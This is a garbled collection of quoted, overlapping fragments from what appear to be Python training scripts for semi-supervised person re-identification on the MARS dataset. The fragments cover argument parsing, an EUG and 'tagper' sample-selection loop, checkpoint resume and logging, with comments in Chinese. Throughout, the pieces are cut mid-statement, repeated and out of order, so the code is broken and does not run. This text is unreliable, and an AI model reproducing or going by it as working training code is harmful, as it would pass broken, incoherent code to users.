{:.2%}", "l_data=l_data, u_data=u_data, save_path=tagper_path, max_frames=args.max_frames, embeding_fea_size=args.fea, momentum=args.momentum, lamda=args.lamda) new_train_data = l_data", "nums_to_select = int(len(u_data) * ratio) nums_to_select_tagper = int(len(u_data) * ratio_t)", "本地跑用这个 cudnn.benchmark = True cudnn.enabled = True save_path = os.path.join(logs_dir,", "@Software: PyCharm # @Desc : from my_reid.eug import * from", "files) return start_step, ckpt_file def main(args): father = Path('/mnt/') if", "cudnn.benchmark = True cudnn.enabled = True save_path = os.path.join(logs_dir, args.dataset,", "select_pre_t ,加上了了tagper的数据. tagper_path = osp.join(save_path,'tagper') #tagper存储路径. if not Path(tagper_path).exists(): os.mkdir(tagper_path)", "end_time - start_time total_time = step_time + total_time train_time_file.write('{} {:.6}", "#迭代模式,确定是否训练tagper for step in range(total_step): # for resume if step", "args.dataset)) num_all_examples = len(dataset_all.train) l_data, u_data = get_init_shot_in_cam1(dataset_all, load_path=\"./examples/{}_init_{}.pickle\".format(dataset_all.name, args.init),", ": <EMAIL> # @File : atmpro1_vsm.py # @Software: PyCharm #", "iter_mode==2 else min(nums_to_select,len(u_data))) #直接翻两倍取数据. -50个样本,保证unselected_data数量不为0 new_train_data, unselected_data, select_pre= eug.generate_new_train_data(selected_idx, pred_y)", "'--momentum', type=float, default=0.5) parser.add_argument('-e', '--epochs', type=int, default=70) parser.add_argument('-s', '--step_size', type=int,", "from iter step\", start_step) else: print(\"resume failed\", start_step, files) return", "momentum=args.momentum, lamda=args.lamda) new_train_data = l_data unselected_data = u_data iter_mode =", "eug.train(new_train_data, unselected_data, step, loss=args.loss, epochs=args.epochs, step_size=args.step_size, init_lr=0.1) if step !=", "0, 0 mAP, rank1, rank5, rank10, rank20 = eug.evaluate(dataset_all.query, dataset_all.gallery)", "if step != resume_step else eug.resume(ckpt_file, step) # 只对eug进行性能评估 #", "rank1, rank5, rank10, rank20 = 0, 0, 0, 0, 0", "num_classes=dataset_all.num_train_ids, dataset=dataset_all, l_data=l_data, u_data=u_data, save_path=tagper_path, max_frames=args.max_frames, embeding_fea_size=args.fea, momentum=args.momentum, lamda=args.lamda) new_train_data", "Path(tagper_path).exists(): os.mkdir(tagper_path) '''# 记录配置信息 和路径''' print('-'*20+'config_info'+'-'*20) config_file = open(osp.join(save_path, 'config.txt'),", "config_info: key,value=map(str,one.split('=')) config_file.write(key.strip()+'='+value.strip('\\'')+'\\n') print(key.strip()+'='+value.strip('\\'')) config_file.write('save_path='+save_path) print('save_path='+save_path) print('-' * 20 +", "# 数据格式为 step_time total_time. total_time = 0 # get all", "args.EF / 100 ratio_t = (step+1+args.t) * args.EF /100 nums_to_select", "else: #mode = 1 # raw_select_pre = raw_select_pre_t # raw_select_pre_t", ": <EMAIL> # @File : atmpro1.py # @Software: PyCharm #", "torch.backends import cudnn from my_reid.utils.serialization import load_checkpoint from torch import", "import models import numpy as np import torch import argparse", "default=0.5) parser.add_argument('-e', '--epochs', type=int, default=70) parser.add_argument('-s', '--step_size', type=int, default=55) parser.add_argument('--lamda',", "'__main__': parser = argparse.ArgumentParser(description='Progressive Learning for One-Example re-ID') parser.add_argument('-d', '--dataset',", "= open(osp.join(save_path,'kf.txt'),'a') # 数据格式为 label_pre_r, select_pre_r,label_pre_t, select_pre_t ,加上了了tagper的数据. tagper_path =", "get all the labeled and unlabeled data for training dataset_all", "# @Email : <EMAIL> # @File : atmpro1_vsm2.py # @Software:", "not Path(tagper_path).exists(): os.mkdir(tagper_path) '''# 记录配置信息 和路径''' print('-'*20+'config_info'+'-'*20) config_file = open(osp.join(save_path,", "args.resume: resume_step, ckpt_file = resume(save_path) # initial the EUG algorithm", "raw_select_pre = raw_select_pre_t # raw_select_pre_t = 0 label_pre,select_pre = raw_label_pre,raw_select_pre", "step, nums_to_select, ratio, save_path)) # train the model or load", "print('tagper is stop') else: #mode = 1 # raw_select_pre =", "default='mars', choices=datasets.names()) parser.add_argument('-b', '--batch-size', type=int, default=16) parser.add_argument('-f', '--fea', type=int, default=1024)", "# -*- coding: utf-8 -*- # @Time : 2020/9/1 下午7:07", "vsm_lambda = args.vsm_lambda*step/(1-(total_step/2)) +args.vsm_lambda vsm_lambda +=1 print(\"Runing: EF={}%, step {}:\\t", "parser = argparse.ArgumentParser(description='Progressive Learning for One-Example re-ID') parser.add_argument('-d', '--dataset', type=str,", "eug.generate_new_train_data(selected_idx, pred_y) raw_label_pre, raw_select_pre = label_pre,select_pre t_label_pre,t_select_pre = 0,0 raw_select_pre_t", "= iter_ ckpt_file = osp.join(savepath, filename) except: continue # if", "logs_dir = Path('/mnt/home/{}'.format(args.log_name)) # 服务器 else: #本地 data_dir = Path('/home/joselyn/workspace/ATM_SERIES/data')", "args.EF, step, nums_to_select, ratio, save_path)) # train the model or", "step, loss=args.loss, epochs=args.epochs, step_size=args.step_size, init_lr=0.1) pred_y, pred_score, label_pre,dists= tagper.estimate_label_vsm() selected_idx", "= time.time() step_time = end_time - start_time total_time = step_time", "torch.nn.parallel import DistributedDataParallel as DDP from torch.utils.data.distributed import DistributedSampler from", "max_frames=args.max_frames, embeding_fea_size=args.fea, momentum=args.momentum, lamda=args.lamda) tagper = EUG(batch_size=args.batch_size, num_classes=dataset_all.num_train_ids, dataset=dataset_all, l_data=l_data,", "print(\"training reid model\") eug.train(new_train_data, unselected_data, step, loss=args.loss, epochs=args.epochs, step_size=args.step_size, init_lr=0.1)", "type=int, default=16) parser.add_argument('-f', '--fea', type=int, default=1024) parser.add_argument('--EF', type=int, default=10) parser.add_argument('--t',", "- 0 vsm_lambda = args.vsm_lambda*step/(1-(total_step/2)) +args.vsm_lambda vsm_lambda +=1 print(\"Runing: EF={}%,", "# get all the labeled and unlabeled data for training", "+ 1 sys.stdout = Logger(osp.join(save_path, 'log' + str(args.EF) + time.strftime(\".%m_%d_%H:%M:%S\")", "embeding_fea_size=args.fea, momentum=args.momentum, lamda=args.lamda) tagper = EUG(batch_size=args.batch_size, num_classes=dataset_all.num_train_ids, dataset=dataset_all, l_data=l_data, u_data=u_data,", "total_time)) kf_file.write('{} {} {} {:.2%} {:.2%} {:.2%} {:.2%} {:.2%}\\n'.format(step,nums_to_select,nums_to_select_tagper,raw_label_pre,raw_select_pre,raw_select_pre_t,t_label_pre,t_select_pre)) dataf_file.write(", "atmpro1.py # @Software: PyCharm # @Desc : from my_reid.eug import", "只记录训练所需要的时间. # 数据格式为 step_time total_time. total_time = 0 # get", "time.strftime(\".%m_%d_%H:%M:%S\") + '.txt')) dataf_file = open(osp.join(save_path, 'dataf.txt'), 'a') # 保存性能数据.", "step in range(total_step): # for resume if step < resume_step:", "is stop') else: #mode = 1 # raw_select_pre = raw_select_pre_t", "rank5, rank10, rank20)) pred_y, pred_score,label_pre,dists= eug.estimate_label_vsm() selected_idx = eug.select_top_data_vsm2(pred_score, dists,args.topk,vsm_lambda,min(nums_to_select_tagper,len(u_data)-50)", "dataset=dataset_all, l_data=l_data, u_data=u_data, save_path=save_path, max_frames=args.max_frames, embeding_fea_size=args.fea, momentum=args.momentum, lamda=args.lamda) tagper =", "= EUG(batch_size=args.batch_size, num_classes=dataset_all.num_train_ids, dataset=dataset_all, l_data=l_data, u_data=u_data, save_path=tagper_path, max_frames=args.max_frames, embeding_fea_size=args.fea, momentum=args.momentum,", "atmpro1_vsm.py # @Software: PyCharm # @Desc : #!/usr/bin/python3.6 # -*-", "ratio_t) if nums_to_select >= len(u_data): break #args.vsm_lambda的衰减 0.5 - 0", "= argparse.ArgumentParser(description='Progressive Learning for One-Example re-ID') parser.add_argument('-d', '--dataset', type=str, default='mars',", "total_time = step_time + total_time train_time_file.write('{} {:.6} {:.6}\\n'.format(step, step_time, total_time))", "select_pre)) dataf_file.close() train_time_file.close() if __name__ == '__main__': parser = argparse.ArgumentParser(description='Progressive", "parser.add_argument('-d', '--dataset', type=str, default='mars', choices=datasets.names()) parser.add_argument('-b', '--batch-size', type=int, default=16) parser.add_argument('-f',", "utf-8 -*- # @Time : 2020/9/3 上午11:03 # @Author :", "in range(total_step): # for resume if step < resume_step: continue", "- start_time total_time = step_time + total_time train_time_file.write('{} {:.6} {:.6}\\n'.format(step,", "(step + 1) * args.EF / 100 ratio_t = (step+1+args.t)", "{:.6}\\n'.format(step, step_time, total_time)) kf_file.write('{} {} {} {:.2%} {:.2%} {:.2%} {:.2%}", "ckpt_file = osp.join(savepath, filename) except: continue # if need resume", "if iter_ > start_step: start_step = iter_ ckpt_file = osp.join(savepath,", "dist from torch.nn.parallel import DistributedDataParallel as DDP from torch.utils.data.distributed import", "数据格式为 label_pre_r, select_pre_r,label_pre_t, select_pre_t ,加上了了tagper的数据. tagper_path = osp.join(save_path,'tagper') #tagper存储路径. if", "if iter_mode==2 else min(nums_to_select,len(u_data))) #直接翻两倍取数据. -50个样本,保证unselected_data数量不为0 new_train_data, unselected_data, select_pre= eug.generate_new_train_data(selected_idx,", "iter_mode==2: raw_select_pre_t = raw_select_pre print(\"training tagper model\") selected_idx = eug.select_top_data_vsm2(pred_score,dists,args.topk,vsm_lambda,", "{}\".format( args.EF, step, nums_to_select, ratio, save_path)) # train the model", "= 0,0 raw_select_pre_t = 0 # label_pre_t,select_pre_t=0,0 if iter_mode==2: raw_select_pre_t", "# @File : atmpro1.py # @Software: PyCharm # @Desc :", "DistributedSampler from pathlib import Path def resume(savepath): import re pattern", "+=1 print(\"Runing: EF={}%, step {}:\\t Nums_to_be_select {} \\t Ritio \\t", "if father.exists(): # 是在服务器上 data_dir = Path('/mnt/share/datasets/RE-ID/data') # 服务器 logs_dir", "step != resume_step else eug.resume(ckpt_file, step) # 只对eug进行性能评估 # mAP,", "num_classes=dataset_all.num_train_ids, dataset=dataset_all, l_data=l_data, u_data=u_data, save_path=save_path, max_frames=args.max_frames, embeding_fea_size=args.fea, momentum=args.momentum, lamda=args.lamda) tagper", "#!/usr/bin/python3.6 # -*- coding: utf-8 -*- # @Time : 2020/9/1", "Logger(osp.join(save_path, 'log' + str(args.EF) + time.strftime(\".%m_%d_%H:%M:%S\") + '.txt')) dataf_file =", "# initial the EUG algorithm eug = EUG(batch_size=args.batch_size, num_classes=dataset_all.num_train_ids, dataset=dataset_all,", "atmpro1_vsm2.py # @Software: PyCharm # @Desc : #!/usr/bin/python3.6 # -*-", "init_lr=0.1) if step != resume_step else eug.resume(ckpt_file, step) # 只对eug进行性能评估", "ratio = (step + 1) * args.EF / 100 ratio_t", "= Path('/home/joselyn/workspace/ATM_SERIES/{}'.format(args.log_name)) # 本地跑用这个 cudnn.benchmark = True cudnn.enabled = True", "# train the model or load ckpt start_time = time.time()", "= os.listdir(savepath) files.sort() for filename in files: try: iter_ =", "= open(osp.join(save_path, 'dataf.txt'), 'a') # 保存性能数据. #特征空间中的性能问题. data_file = open(osp.join(save_path,", "* ratio) nums_to_select_tagper = int(len(u_data) * ratio_t) if nums_to_select >=", "kf_file = open(osp.join(save_path,'kf.txt'),'a') # 数据格式为 label_pre_r, select_pre_r,label_pre_t, select_pre_t ,加上了了tagper的数据. tagper_path", "if start_step >= 0: print(\"continued from iter step\", start_step) else:", "args.exp_order) # 到编号位置. total_step = 100 // args.EF + 1", "{:.2%} {:.2%}'.format(step, label_pre, select_pre)) tagper.resume(osp.join(save_path,'step_{}.ckpt'.format(step)),step) tagper.train(new_train_data, unselected_data, step, loss=args.loss, epochs=args.epochs,", "// args.EF + 1 sys.stdout = Logger(osp.join(save_path, 'log' + str(args.EF)", "Path def resume(savepath): import re pattern = re.compile(r'step_(\\d+)\\.ckpt') start_step =", "#切换模式 print('tagper is stop') else: #mode = 1 # raw_select_pre", "import * from my_reid import datasets from my_reid import models", "start_step, ckpt_file def main(args): father = Path('/mnt/') if father.exists(): #", "= resume(save_path) # initial the EUG algorithm eug = EUG(batch_size=args.batch_size,", "else min(nums_to_select,len(u_data))) #直接翻两倍取数据. -50个样本,保证unselected_data数量不为0 new_train_data, unselected_data, select_pre= eug.generate_new_train_data(selected_idx, pred_y) raw_label_pre,", "choices=datasets.names()) parser.add_argument('-b', '--batch-size', type=int, default=16) parser.add_argument('-f', '--fea', type=int, default=1024) parser.add_argument('--EF',", "else eug.resume(ckpt_file, step) # 只对eug进行性能评估 # mAP, rank1, rank5, rank10,", "= EUG(batch_size=args.batch_size, num_classes=dataset_all.num_train_ids, dataset=dataset_all, l_data=l_data, u_data=u_data, save_path=save_path, max_frames=args.max_frames, embeding_fea_size=args.fea, momentum=args.momentum,", "train_time_file.write('{} {:.6} {:.6}\\n'.format(step, step_time, total_time)) kf_file.write('{} {} {} {:.2%} {:.2%}", "eug.select_top_data_vsm2(pred_score, dists,args.topk,vsm_lambda,min(nums_to_select_tagper,len(u_data)-50) if iter_mode==2 else min(nums_to_select,len(u_data))) #直接翻两倍取数据. -50个样本,保证unselected_data数量不为0 new_train_data, unselected_data,", "ckpt start_time = time.time() print(\"training reid model\") eug.train(new_train_data, unselected_data, step,", "datasets.create(args.dataset, osp.join(data_dir, args.dataset)) num_all_examples = len(dataset_all.train) l_data, u_data = get_init_shot_in_cam1(dataset_all,", "dataset_all.gallery) # 把数据写到data文件里. data_file.write('{} {:.2%} {:.2%} {:.2%} {:.2%} {:.2%}\\n'.format(step, mAP,", "l_data unselected_data = u_data iter_mode = 2 #迭代模式,确定是否训练tagper for step", "Joselynzhao # @Email : <EMAIL> # @File : atmpro1_vsm2.py #", "parser.add_argument('--t', type=float, default=2) #不再tagper采样的倍率, 而是表示跨多少个step采样. parser.add_argument('--exp_order', type=str, default='0') parser.add_argument('--exp_name', type=str,", "{:.2%} {:.2%} {:.2%}\\n'.format(step,nums_to_select,nums_to_select_tagper,raw_label_pre,raw_select_pre,raw_select_pre_t,t_label_pre,t_select_pre)) dataf_file.write( '{} {:.2%} {:.2%}\\n'.format(step, label_pre, select_pre)) dataf_file.close()", "from torch.nn.parallel import DistributedDataParallel as DDP from torch.utils.data.distributed import DistributedSampler", "unselected_data = u_data iter_mode = 2 #迭代模式,确定是否训练tagper for step in", "data_file = open(osp.join(save_path, 'data.txt'), 'a') # 保存性能数据. #特征空间中的性能问题. kf_file =", "和路径''' print('-'*20+'config_info'+'-'*20) config_file = open(osp.join(save_path, 'config.txt'), 'w') config_info = str(args).split('(')[1].strip(')').split(',')", "total_time = 0 # get all the labeled and unlabeled", "as osp import sys from torch.backends import cudnn from my_reid.utils.serialization", "parser.add_argument('--log_name',type=str,default='pl_logs') parser.add_argument('--topk',type=int,default=2) parser.add_argument('--vsm_lambda',type=float,default=0.5) parser.add_argument('--resume', type=str, default='Yes') parser.add_argument('--max_frames', type=int, default=900) parser.add_argument('--loss',", "EUG(batch_size=args.batch_size, num_classes=dataset_all.num_train_ids, dataset=dataset_all, l_data=l_data, u_data=u_data, save_path=tagper_path, max_frames=args.max_frames, embeding_fea_size=args.fea, momentum=args.momentum, lamda=args.lamda)", "import pickle import torch.distributed as dist from torch.nn.parallel import DistributedDataParallel", "data_dir = Path('/home/joselyn/workspace/ATM_SERIES/data') # 本地跑用这个 logs_dir = Path('/home/joselyn/workspace/ATM_SERIES/{}'.format(args.log_name)) # 本地跑用这个", "os.mkdir(tagper_path) '''# 记录配置信息 和路径''' print('-'*20+'config_info'+'-'*20) config_file = open(osp.join(save_path, 'config.txt'), 'w')", "'dataf.txt'), 'a') # 保存性能数据. #特征空间中的性能问题. data_file = open(osp.join(save_path, 'data.txt'), 'a')", "my_reid.utils.logging import Logger import os.path as osp import sys from", "_, _, raw_select_pre = eug.generate_new_train_data(selected_idx, pred_y) # kf_file.write('{} {:.2%} {:.2%}'.format(step,", "= 100 // args.EF + 1 sys.stdout = Logger(osp.join(save_path, 'log'", "resume_step, ckpt_file = resume(save_path) # initial the EUG algorithm eug", "label_pre,select_pre label_pre,select_pre = t_label_pre,t_select_pre if nums_to_select_tagper >=len(u_data): iter_mode=1 #切换模式 print('tagper", "'ExLoss']) parser.add_argument('--init', type=float, default=-1) parser.add_argument('-m', '--momentum', type=float, default=0.5) parser.add_argument('-e', '--epochs',", "train_time_file.close() if __name__ == '__main__': parser = argparse.ArgumentParser(description='Progressive Learning for", "'time.txt'), 'a') # 只记录训练所需要的时间. # 数据格式为 step_time total_time. total_time =", "time import pickle import torch.distributed as dist from torch.nn.parallel import", "continue ratio = (step + 1) * args.EF / 100", "Logs-dir {}\".format( args.EF, step, nums_to_select, ratio, save_path)) # train the", "kf_file.write('{} {:.2%} {:.2%}'.format(step, label_pre, select_pre)) tagper.resume(osp.join(save_path,'step_{}.ckpt'.format(step)),step) tagper.train(new_train_data, unselected_data, step, loss=args.loss,", "# 采样目标数量 new_train_data, unselected_data, select_pre= tagper.generate_new_train_data(selected_idx, pred_y) t_label_pre,t_select_pre = label_pre,select_pre", "@File : atmpro1_vsm.py # @Software: PyCharm # @Desc : #!/usr/bin/python3.6", "selected_idx = eug.select_top_data_vsm2(pred_score,dists,args.topk,vsm_lambda, min(nums_to_select, len(u_data))) _, _, raw_select_pre = eug.generate_new_train_data(selected_idx,", "start_step = -1 ckpt_file = \"\" # find start step", "EF={}%, step {}:\\t Nums_to_be_select {} \\t Ritio \\t Logs-dir {}\".format(", "# 到编号位置. total_step = 100 // args.EF + 1 sys.stdout", "osp.join(data_dir, args.dataset)) num_all_examples = len(dataset_all.train) l_data, u_data = get_init_shot_in_cam1(dataset_all, load_path=\"./examples/{}_init_{}.pickle\".format(dataset_all.name,", "parser.add_argument('-f', '--fea', type=int, default=1024) parser.add_argument('--EF', type=int, default=10) parser.add_argument('--t', type=float, default=2)", "/100 nums_to_select = int(len(u_data) * ratio) nums_to_select_tagper = int(len(u_data) *", "resume if step < resume_step: continue ratio = (step +", "100 ratio_t = (step+1+args.t) * args.EF /100 nums_to_select = int(len(u_data)", "label_pre, select_pre)) tagper.resume(osp.join(save_path,'step_{}.ckpt'.format(step)),step) tagper.train(new_train_data, unselected_data, step, loss=args.loss, epochs=args.epochs, step_size=args.step_size, init_lr=0.1)", "epochs=args.epochs, step_size=args.step_size, init_lr=0.1) pred_y, pred_score, label_pre,dists= tagper.estimate_label_vsm() selected_idx = tagper.select_top_data_vsm2(pred_score,dists,args.topk,vsm_lambda,min(nums_to_select,len(u_data)))", "# 是在服务器上 data_dir = Path('/mnt/share/datasets/RE-ID/data') # 服务器 logs_dir = Path('/mnt/home/{}'.format(args.log_name))", "print('-' * 20 + 'config_info' + '-' * 20) config_file.close()", "choices=['CrossEntropyLoss', 'ExLoss']) parser.add_argument('--init', type=float, default=-1) parser.add_argument('-m', '--momentum', type=float, default=0.5) parser.add_argument('-e',", "for step in range(total_step): # for resume if step <", "tagper.estimate_label_vsm() selected_idx = tagper.select_top_data_vsm2(pred_score,dists,args.topk,vsm_lambda,min(nums_to_select,len(u_data))) # 采样目标数量 new_train_data, unselected_data, select_pre= tagper.generate_new_train_data(selected_idx,", "\\t Ritio \\t Logs-dir {}\".format( args.EF, step, nums_to_select, ratio, save_path))", "import cudnn from my_reid.utils.serialization import load_checkpoint from torch import nn", "model\") selected_idx = eug.select_top_data_vsm2(pred_score,dists,args.topk,vsm_lambda, min(nums_to_select, len(u_data))) _, _, raw_select_pre =", "start_step >= 0: print(\"continued from iter step\", start_step) else: print(\"resume", "-*- # @Time : 2020/9/3 上午11:03 # @Author : Joselynzhao", "PyCharm # @Desc : #!/usr/bin/python3.6 # -*- coding: utf-8 -*-", "resume_step else eug.resume(ckpt_file, step) # 只对eug进行性能评估 # mAP, rank1, rank5,", "raw_select_pre = label_pre,select_pre t_label_pre,t_select_pre = 0,0 raw_select_pre_t = 0 #", "-*- coding: utf-8 -*- # @Time : 2020/8/26 下午8:26 #", "rank20 = eug.evaluate(dataset_all.query, dataset_all.gallery) # 把数据写到data文件里. data_file.write('{} {:.2%} {:.2%} {:.2%}", "{} {} {:.2%} {:.2%} {:.2%} {:.2%} {:.2%}\\n'.format(step,nums_to_select,nums_to_select_tagper,raw_label_pre,raw_select_pre,raw_select_pre_t,t_label_pre,t_select_pre)) dataf_file.write( '{} {:.2%}", "continue # if need resume if start_step >= 0: print(\"continued", ": <EMAIL> # @File : atmpro1_vsm2.py # @Software: PyCharm #", "open(osp.join(save_path, 'data.txt'), 'a') # 保存性能数据. #特征空间中的性能问题. kf_file = open(osp.join(save_path,'kf.txt'),'a') #", "{:.2%}'.format(step, label_pre, select_pre)) tagper.resume(osp.join(save_path,'step_{}.ckpt'.format(step)),step) tagper.train(new_train_data, unselected_data, step, loss=args.loss, epochs=args.epochs, step_size=args.step_size,", "= -1 ckpt_file = \"\" # find start step files", "type=float, default=0.5) parser.add_argument('-e', '--epochs', type=int, default=70) parser.add_argument('-s', '--step_size', type=int, default=55)", "= eug.evaluate(dataset_all.query, dataset_all.gallery) # 把数据写到data文件里. data_file.write('{} {:.2%} {:.2%} {:.2%} {:.2%}", "而是表示跨多少个step采样. parser.add_argument('--exp_order', type=str, default='0') parser.add_argument('--exp_name', type=str, default='atm') parser.add_argument('--exp_aim', type=str, default='for", "select_pre= eug.generate_new_train_data(selected_idx, pred_y) raw_label_pre, raw_select_pre = label_pre,select_pre t_label_pre,t_select_pre = 0,0", "torch import nn import time import pickle import torch.distributed as", "find start step files = os.listdir(savepath) files.sort() for filename in", "args.init), init=args.init) resume_step, ckpt_file = -1, '' if args.resume: resume_step,", "rank20 = 0, 0, 0, 0, 0 mAP, rank1, rank5,", "type=str, default='atm') parser.add_argument('--exp_aim', type=str, default='for paper') parser.add_argument('--run_file',type=str,default='train.py') parser.add_argument('--log_name',type=str,default='pl_logs') parser.add_argument('--topk',type=int,default=2) parser.add_argument('--vsm_lambda',type=float,default=0.5)", "# @Email : <EMAIL> # @File : atmpro1_vsm.py # @Software:", ",加上了了tagper的数据. tagper_path = osp.join(save_path,'tagper') #tagper存储路径. if not Path(tagper_path).exists(): os.mkdir(tagper_path) '''#", ": 2020/8/26 下午8:26 # @Author : Joselynzhao # @Email :", "\"\" # find start step files = os.listdir(savepath) files.sort() for", "filename in files: try: iter_ = int(pattern.search(filename).groups()[0]) print(iter_) if iter_", "EUG algorithm eug = EUG(batch_size=args.batch_size, num_classes=dataset_all.num_train_ids, dataset=dataset_all, l_data=l_data, u_data=u_data, save_path=save_path,", "step_time + total_time train_time_file.write('{} {:.6} {:.6}\\n'.format(step, step_time, total_time)) kf_file.write('{} {}", "# @Software: PyCharm # @Desc : #!/usr/bin/python3.6 # -*- coding:", "int(len(u_data) * ratio_t) if nums_to_select >= len(u_data): break #args.vsm_lambda的衰减 0.5", "'a') # 只记录训练所需要的时间. # 数据格式为 step_time total_time. total_time = 0", "if need resume if start_step >= 0: print(\"continued from iter", "0, 0, 0 mAP, rank1, rank5, rank10, rank20 = eug.evaluate(dataset_all.query,", "= 2 #迭代模式,确定是否训练tagper for step in range(total_step): # for resume", "str(args).split('(')[1].strip(')').split(',') config_info.sort() for one in config_info: key,value=map(str,one.split('=')) config_file.write(key.strip()+'='+value.strip('\\'')+'\\n') print(key.strip()+'='+value.strip('\\'')) config_file.write('save_path='+save_path)", "_, raw_select_pre = eug.generate_new_train_data(selected_idx, pred_y) # kf_file.write('{} {:.2%} {:.2%}'.format(step, label_pre,", "resume(save_path) # initial the EUG algorithm eug = EUG(batch_size=args.batch_size, num_classes=dataset_all.num_train_ids,", "{} {:.2%} {:.2%} {:.2%} {:.2%} {:.2%}\\n'.format(step,nums_to_select,nums_to_select_tagper,raw_label_pre,raw_select_pre,raw_select_pre_t,t_label_pre,t_select_pre)) dataf_file.write( '{} {:.2%} {:.2%}\\n'.format(step,", "tagper = EUG(batch_size=args.batch_size, num_classes=dataset_all.num_train_ids, dataset=dataset_all, l_data=l_data, u_data=u_data, save_path=tagper_path, max_frames=args.max_frames, embeding_fea_size=args.fea,", "for One-Example re-ID') parser.add_argument('-d', '--dataset', type=str, default='mars', choices=datasets.names()) parser.add_argument('-b', '--batch-size',", "raw_label_pre,raw_select_pre end_time = time.time() step_time = end_time - start_time total_time", "本地跑用这个 logs_dir = Path('/home/joselyn/workspace/ATM_SERIES/{}'.format(args.log_name)) # 本地跑用这个 cudnn.benchmark = True cudnn.enabled", "{:.2%}\\n'.format(step,nums_to_select,nums_to_select_tagper,raw_label_pre,raw_select_pre,raw_select_pre_t,t_label_pre,t_select_pre)) dataf_file.write( '{} {:.2%} {:.2%}\\n'.format(step, label_pre, select_pre)) dataf_file.close() train_time_file.close() if", "-1 ckpt_file = \"\" # find start step files =", "from my_reid import datasets from my_reid import models import numpy", "iter_ = int(pattern.search(filename).groups()[0]) print(iter_) if iter_ > start_step: start_step =", "+ 'config_info' + '-' * 20) config_file.close() train_time_file = open(osp.join(save_path,", "vsm_lambda +=1 print(\"Runing: EF={}%, step {}:\\t Nums_to_be_select {} \\t Ritio", "step_size=args.step_size, init_lr=0.1) pred_y, pred_score, label_pre,dists= tagper.estimate_label_vsm() selected_idx = tagper.select_top_data_vsm2(pred_score,dists,args.topk,vsm_lambda,min(nums_to_select,len(u_data))) #", "tagper_path = osp.join(save_path,'tagper') #tagper存储路径. if not Path(tagper_path).exists(): os.mkdir(tagper_path) '''# 记录配置信息", "args.dataset, args.exp_name, args.exp_order) # 到编号位置. total_step = 100 // args.EF", "lamda=args.lamda) tagper = EUG(batch_size=args.batch_size, num_classes=dataset_all.num_train_ids, dataset=dataset_all, l_data=l_data, u_data=u_data, save_path=tagper_path, max_frames=args.max_frames,", "{:.2%} {:.2%} {:.2%} {:.2%}\\n'.format(step, mAP, rank1, rank5, rank10, rank20)) pred_y,", "father = Path('/mnt/') if father.exists(): # 是在服务器上 data_dir = Path('/mnt/share/datasets/RE-ID/data')", "服务器 logs_dir = Path('/mnt/home/{}'.format(args.log_name)) # 服务器 else: #本地 data_dir =", "ratio) nums_to_select_tagper = int(len(u_data) * ratio_t) if nums_to_select >= len(u_data):", "if nums_to_select >= len(u_data): break #args.vsm_lambda的衰减 0.5 - 0 vsm_lambda", "dataset=dataset_all, l_data=l_data, u_data=u_data, save_path=tagper_path, max_frames=args.max_frames, embeding_fea_size=args.fea, momentum=args.momentum, lamda=args.lamda) new_train_data =", "= 0 # get all the labeled and unlabeled data", "raw_select_pre = eug.generate_new_train_data(selected_idx, pred_y) # kf_file.write('{} {:.2%} {:.2%}'.format(step, label_pre, select_pre))", "pred_y) # kf_file.write('{} {:.2%} {:.2%}'.format(step, label_pre, select_pre)) tagper.resume(osp.join(save_path,'step_{}.ckpt'.format(step)),step) tagper.train(new_train_data, unselected_data,", "tagper.select_top_data_vsm2(pred_score,dists,args.topk,vsm_lambda,min(nums_to_select,len(u_data))) # 采样目标数量 new_train_data, unselected_data, select_pre= tagper.generate_new_train_data(selected_idx, pred_y) t_label_pre,t_select_pre =", "parser.add_argument('--max_frames', type=int, default=900) parser.add_argument('--loss', type=str, default='ExLoss', choices=['CrossEntropyLoss', 'ExLoss']) parser.add_argument('--init', type=float,", "iter step\", start_step) else: print(\"resume failed\", start_step, files) return start_step,", "new_train_data, unselected_data, select_pre= eug.generate_new_train_data(selected_idx, pred_y) raw_label_pre, raw_select_pre = label_pre,select_pre t_label_pre,t_select_pre", "str(args.EF) + time.strftime(\".%m_%d_%H:%M:%S\") + '.txt')) dataf_file = open(osp.join(save_path, 'dataf.txt'), 'a')", "num_all_examples = len(dataset_all.train) l_data, u_data = get_init_shot_in_cam1(dataset_all, load_path=\"./examples/{}_init_{}.pickle\".format(dataset_all.name, args.init), init=args.init)", "load_path=\"./examples/{}_init_{}.pickle\".format(dataset_all.name, args.init), init=args.init) resume_step, ckpt_file = -1, '' if args.resume:", ": atmpro1_vsm2.py # @Software: PyCharm # @Desc : #!/usr/bin/python3.6 #", "files.sort() for filename in files: try: iter_ = int(pattern.search(filename).groups()[0]) print(iter_)", "20 + 'config_info' + '-' * 20) config_file.close() train_time_file =", "loss=args.loss, epochs=args.epochs, step_size=args.step_size, init_lr=0.1) if step != resume_step else eug.resume(ckpt_file,", "rank5, rank10, rank20 = 0, 0, 0, 0, 0 mAP,", "tagper.resume(osp.join(save_path,'step_{}.ckpt'.format(step)),step) tagper.train(new_train_data, unselected_data, step, loss=args.loss, epochs=args.epochs, step_size=args.step_size, init_lr=0.1) pred_y, pred_score,", "@Software: PyCharm # @Desc : #!/usr/bin/python3.6 # -*- coding: utf-8", "unselected_data, select_pre= eug.generate_new_train_data(selected_idx, pred_y) raw_label_pre, raw_select_pre = label_pre,select_pre t_label_pre,t_select_pre =", "label_pre_t,select_pre_t=0,0 if iter_mode==2: raw_select_pre_t = raw_select_pre print(\"training tagper model\") selected_idx", "else: print(\"resume failed\", start_step, files) return start_step, ckpt_file def main(args):", "# 保存性能数据. #特征空间中的性能问题. data_file = open(osp.join(save_path, 'data.txt'), 'a') # 保存性能数据.", "args.exp_name, args.exp_order) # 到编号位置. total_step = 100 // args.EF +", "momentum=args.momentum, lamda=args.lamda) tagper = EUG(batch_size=args.batch_size, num_classes=dataset_all.num_train_ids, dataset=dataset_all, l_data=l_data, u_data=u_data, save_path=tagper_path,", "= u_data iter_mode = 2 #迭代模式,确定是否训练tagper for step in range(total_step):", "# raw_select_pre = raw_select_pre_t # raw_select_pre_t = 0 label_pre,select_pre =", "type=str, default='Yes') parser.add_argument('--max_frames', type=int, default=900) parser.add_argument('--loss', type=str, default='ExLoss', choices=['CrossEntropyLoss', 'ExLoss'])", "start_step = iter_ ckpt_file = osp.join(savepath, filename) except: continue #", "数据格式为 step_time total_time. total_time = 0 # get all the", "= (step+1+args.t) * args.EF /100 nums_to_select = int(len(u_data) * ratio)", "unselected_data, step, loss=args.loss, epochs=args.epochs, step_size=args.step_size, init_lr=0.1) if step != resume_step", "all the labeled and unlabeled data for training dataset_all =", "Joselynzhao # @Email : <EMAIL> # @File : atmpro1_vsm.py #", "as dist from 